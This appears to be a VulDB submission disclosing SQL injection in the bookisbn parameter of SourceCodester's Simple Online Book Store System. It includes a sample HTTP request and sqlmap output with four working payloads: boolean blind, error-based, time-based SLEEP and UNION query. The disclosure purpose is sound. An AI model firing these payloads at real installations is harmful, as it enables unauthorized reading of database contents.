Title | SourceCodester Simple Online Book Store System book.php SQL injection |
---|
Description | SQL injection exists in the bookisbn parameter of /obs/book.php. Attackers can insert malicious statements to disambiguate SQL queries
request:
GET /obs/book.php?bookisbn=64568 HTTP/1.1
Host: 192.168.0.18:8081
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=g7kjmvh3bfv7hdval8mjn5kcnj
Upgrade-Insecure-Requests: 1
sqlmap response:
sqlmap identified the following injection point(s) with a total of 60 HTTP(s) requests:
---
Parameter: bookisbn (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: bookisbn=64568' AND 1360=1360 AND 'PGUu'='PGUu
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: bookisbn=64568' AND GTID_SUBSET(CONCAT(0x717a787a71,(SELECT (ELT(3201=3201,1))),0x71707a7871),3201) AND 'bAFN'='bAFN
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: bookisbn=64568' AND (SELECT 2801 FROM (SELECT(SLEEP(5)))jPeL) AND 'nQyG'='nQyG
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: bookisbn=-4971' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x717a787a71,0x6c506b6b5467516766704a68726a75417063447650714a6c756c626b675545577361767a59424955,0x71707a7871),NULL,NULL,NULL-- -
--- |
---|
Source | ⚠️ www.sourcecodester.com/php/15423/simple-online-book-store-system-php-free-source-code.html |
---|
User | weicheng (ID 30823) |
---|
Submission | 2022年08月10日 15:21 (2 years ago) |
---|
Moderation | 2022年08月11日 11:08 (20 hours later) |
---|
Status | 承諾済み |
---|
VulDB Entry | 206166 |
---|